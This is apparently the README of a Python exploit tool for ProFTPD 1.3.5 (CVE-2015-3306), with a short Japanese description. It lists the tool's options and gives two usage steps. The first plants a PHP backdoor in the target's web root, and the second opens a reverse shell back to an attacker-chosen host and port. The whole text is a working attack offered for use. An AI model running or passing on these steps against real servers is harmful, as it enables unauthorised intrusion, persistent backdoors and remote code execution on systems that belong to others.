
ProFTPD 1.3.5 CVE-2015-3306 用のエクスプロイトで、ターゲットの Web ルートに PHP バックドアを書き込み、リモートコード実行用のリバースシェルを起動します。
ProFTPd 1.3.5 RCE
Usage: ProFTPD.py [options]
Options:
-h, --help show this help message and exit
-l LHOST, --lhost=LHOST
Local IP Required for Reverse Shell,
-p LPORT, --lport=LPORT
Port Required for Reverse Shell,
-t TARGET, --target=TARGET
Vulnerable Target,
-d DIRECTORY, --dir=DIRECTORY
WebRoot directory to Upload Backdoor, Default: /var/www/html
-c COMMAND, --command=COMMAND
System Command,
-f FILE, --file=FILE
Backdoor Name, Default: shell.php.
ステップ 1 - 標的マシンにバックドアを書き込む!
Usage: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'
ステップ 2 - シェルを取得!!
Usage: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242